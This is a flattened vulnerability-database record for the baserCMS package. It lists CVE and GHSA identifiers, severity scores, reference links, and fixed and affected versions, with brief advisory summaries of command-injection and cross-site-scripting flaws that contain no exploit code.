scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-51450
5
reference_url https://github.com/advisories/GHSA-77fc-4cv5-hmfr
reference_id GHSA-77fc-4cv5-hmfr
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-77fc-4cv5-hmfr
6
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr
reference_id GHSA-77fc-4cv5-hmfr
reference_type
scores
0
value 5.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-22T16:32:12Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-77fc-4cv5-hmfr
fixed_packages
0
url pkg:composer/baserproject/basercms@5.0.9
purl pkg:composer/baserproject/basercms@5.0.9
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-k5qv-4yp3-zbgf
7
vulnerability VCID-khft-xvrw-g3dr
8
vulnerability VCID-mfm9-gsh3-ubg8
9
vulnerability VCID-p695-t9ye-v3ga
10
vulnerability VCID-sqr4-v889-tff8
11
vulnerability VCID-y2sz-c6vb-pkdp
12
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.9
aliases CVE-2023-51450, GHSA-77fc-4cv5-hmfr
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-uedz-j2vn-cbea
14
url VCID-y2sz-c6vb-pkdp
vulnerability_id VCID-y2sz-c6vb-pkdp
summary 
baserCMS Update Functionality Vulnerable to OS Command Injection
### Summary
The latest version of baserCMS (basercms-5.2.2) contains an OS command injection vulnerability (CWE-78) in its update functionality.
Due to this issue, an authenticated user with administrator privileges in baserCMS can execute arbitrary OS commands on the server with the privileges of the user account running baserCMS.

### Details
Please refer to the attached materials.
[OSコマンドインジェクション(baserCMSのアップデート機能).pdf](https://github.com/user-attachments/files/25468689/OS.baserCMS.pdf)



### Impact
An authenticated user with administrator privileges in baserCMS can execute OS commands on the server with the privileges of the user account running baserCMS.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30877
reference_id
reference_type
scores
0
value 0.00063
scoring_system epss
scoring_elements 0.19955
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30877
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30877
reference_id
reference_type
scores
0
value 9.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30877
6
reference_url https://github.com/advisories/GHSA-m9g7-rgfc-jcm7
reference_id GHSA-m9g7-rgfc-jcm7
reference_type
scores
url https://github.com/advisories/GHSA-m9g7-rgfc-jcm7
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30877, GHSA-m9g7-rgfc-jcm7
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-y2sz-c6vb-pkdp
15
url VCID-zqd4-rdem-jfgk
vulnerability_id VCID-zqd4-rdem-jfgk
summary 
baserCMS has a cross-site scripting vulnerability in blog posts.

### Target
baserCMS 5.2.1 and earlier versions

### Vulnerability

Malicious Javascript may be executed in blog posts.

### Countermeasures
Update to the latest version of baserCMS

Please refer to the following page to reference for more information.
https://basercms.net/security/JVN_20837860

### Credits

Gai Tanaka@Mitsui Bussan Secure Directions, Inc.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-30879
reference_id
reference_type
scores
0
value 0.00012
scoring_system epss
scoring_elements 0.01615
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-30879
1
reference_url https://basercms.net/security/JVN_20837860
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://basercms.net/security/JVN_20837860
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/releases/tag/5.2.3
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://github.com/baserproject/basercms/releases/tag/5.2.3
4
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-30879
reference_id
reference_type
scores
0
value 6.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-30879
6
reference_url https://github.com/advisories/GHSA-jmq3-x8q7-j9qm
reference_id GHSA-jmq3-x8q7-j9qm
reference_type
scores
url https://github.com/advisories/GHSA-jmq3-x8q7-j9qm
fixed_packages
0
url pkg:composer/baserproject/basercms@5.2.3
purl pkg:composer/baserproject/basercms@5.2.3
is_vulnerable false
affected_by_vulnerabilities
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3
aliases CVE-2026-30879, GHSA-jmq3-x8q7-j9qm
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-zqd4-rdem-jfgk
Fixing_vulnerabilities
0
url VCID-g56w-z9cx-5ygv
vulnerability_id VCID-g56w-z9cx-5ygv
summary Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') in baserproject/basercms.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-29009
reference_id
reference_type
scores
0
value 0.0055
scoring_system epss
scoring_elements 0.68361
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-29009
1
reference_url https://basercms.net/security/JVN_45547161
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://basercms.net/security/JVN_45547161
2
reference_url https://github.com/baserproject/basercms
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms
3
reference_url https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/baserproject/basercms/commit/919c3ccbbd7a2432967dcb2e428131cc7ad71bb2
4
reference_url https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://github.com/baserproject/basercms/releases/tag/basercms-4.8.0
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-29009
reference_id
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-29009
6
reference_url https://github.com/advisories/GHSA-8vqx-prq4-rqrq
reference_id GHSA-8vqx-prq4-rqrq
reference_type
scores
url https://github.com/advisories/GHSA-8vqx-prq4-rqrq
7
reference_url https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq
reference_id GHSA-8vqx-prq4-rqrq
reference_type
scores
0
value 6.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-09-09T14:59:04Z/
url https://github.com/baserproject/basercms/security/advisories/GHSA-8vqx-prq4-rqrq
fixed_packages
0
url pkg:composer/baserproject/basercms@4.8.0
purl pkg:composer/baserproject/basercms@4.8.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@4.8.0
1
url pkg:composer/baserproject/basercms@5.0.0-beta1
purl pkg:composer/baserproject/basercms@5.0.0-beta1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3new-f12y-8bf9
1
vulnerability VCID-4zw8-truk-pugf
2
vulnerability VCID-7x3n-4c2b-nfbx
3
vulnerability VCID-8buz-nsr9-3yge
4
vulnerability VCID-8ssu-umet-37bk
5
vulnerability VCID-d1sf-cmct-zbh1
6
vulnerability VCID-ggv8-3v9t-mfea
7
vulnerability VCID-k5qv-4yp3-zbgf
8
vulnerability VCID-khft-xvrw-g3dr
9
vulnerability VCID-mfm9-gsh3-ubg8
10
vulnerability VCID-nxrf-64er-xbfx
11
vulnerability VCID-p695-t9ye-v3ga
12
vulnerability VCID-sqr4-v889-tff8
13
vulnerability VCID-uedz-j2vn-cbea
14
vulnerability VCID-y2sz-c6vb-pkdp
15
vulnerability VCID-zqd4-rdem-jfgk
resource_url http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0-beta1
aliases CVE-2023-29009, GHSA-8vqx-prq4-rqrq
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-g56w-z9cx-5ygv
Risk_scorenull
Resource_urlhttp://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.0-beta1